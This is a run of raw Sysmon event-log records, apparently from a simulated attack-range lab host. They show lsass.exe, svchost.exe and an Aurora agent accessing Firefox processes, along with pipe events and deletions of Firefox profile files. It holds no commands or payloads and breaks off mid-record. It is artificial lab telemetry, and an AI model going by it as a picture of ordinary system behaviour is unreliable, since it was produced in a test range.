Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047970Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.983{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047969Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.983{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047968Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.968{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047967Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.968{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047966Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.968{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047965Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.968{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047964Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.968{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047963Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.968{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047962Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.968{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 17141700x800000000000000047961Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:36.968{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\chrome.3304.2.182850921C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000047960Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.953{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047959Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.953{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047958Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.953{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000047957Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.795{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047956Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.780{FE4C2B44-E66B-63C7-9B06-00000000AF02}33044516C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66C-63C7-9C06-00000000AF02}3260C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+b7bc2c|C:\Program Files\Mozilla Firefox\xul.dll+b7b970|C:\Program Files\Mozilla Firefox\xul.dll+283bd30|C:\Program Files\Mozilla Firefox\xul.dll+25060b4|C:\Program Files\Mozilla Firefox\xul.dll+1a94a5b|C:\Program Files\Mozilla Firefox\xul.dll+1a9651a|C:\Program Files\Mozilla Firefox\xul.dll+17d2563|C:\Program Files\Mozilla Firefox\xul.dll+1a96c19|C:\Program Files\Mozilla Firefox\xul.dll+3bb937d|C:\Program Files\Mozilla Firefox\xul.dll+f87be3|C:\Program Files\Mozilla Firefox\xul.dll+f86c65|C:\Program Files\Mozilla Firefox\xul.dll+f821a4|C:\Windows\System32\user32.dll+121e4|C:\Windows\System32\user32.dll+11b2c|C:\Program Files\Mozilla Firefox\xul.dll+193aa18|C:\Program Files\Mozilla Firefox\xul.dll+17e4953|C:\Program Files\Mozilla Firefox\xul.dll+1ac0339|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+16d888|C:\Program Files\Mozilla Firefox\xul.dll+16c717|C:\Program Files\Mozilla Firefox\xul.dll+46b6cd1 23542300x800000000000000047955Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.769{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D43ABA6AB612CCD9294704E7D0459FDD,SHA256=96D86F20437E7A29E15E4E39473EB99D3D46E40A3969054517B8AB3866B58734,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047954Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.759{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66C-63C7-9C06-00000000AF02}3260C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047953Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.759{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66C-63C7-9C06-00000000AF02}3260C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047952Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.759{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66C-63C7-9C06-00000000AF02}3260C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047951Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.732{FE4C2B44-E66B-63C7-9B06-00000000AF02}33045548C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66C-63C7-9D06-00000000AF02}4960C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+1ab6bf1|C:\Program Files\Mozilla Firefox\xul.dll+1ab4ec7|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000047950Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:36.732{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\chrome.3304.1.49728725C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000047949Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.726{FE4C2B44-E66B-63C7-9B06-00000000AF02}33046440C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66C-63C7-9D06-00000000AF02}4960C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+10a7bb|C:\Program Files\Mozilla Firefox\xul.dll+130eca0|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000047948Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:36.726{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\gecko-crash-server-pipe.3304C:\Program Files\Mozilla Firefox\firefox.exe 23542300x800000000000000047947Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.717{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\2752s6y5.default-release\cache2\doomed\14651MD5=F2DEC30E343971EFD9179728E944DFCF,SHA256=1C511246061FCEF7E034F9DE13BC1D8FDC450F80830D1E1625E7AB2D335EF4DA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047946Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.710{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\cookies.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047945Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.699{FE4C2B44-E66B-63C7-9B06-00000000AF02}33045548C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66C-63C7-9D06-00000000AF02}4960C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+9e834a|C:\Program Files\Mozilla Firefox\xul.dll+ebac4|C:\Program Files\Mozilla Firefox\xul.dll+2581e76|C:\Program Files\Mozilla Firefox\xul.dll+1ab508d|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047944Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.694{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047943Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 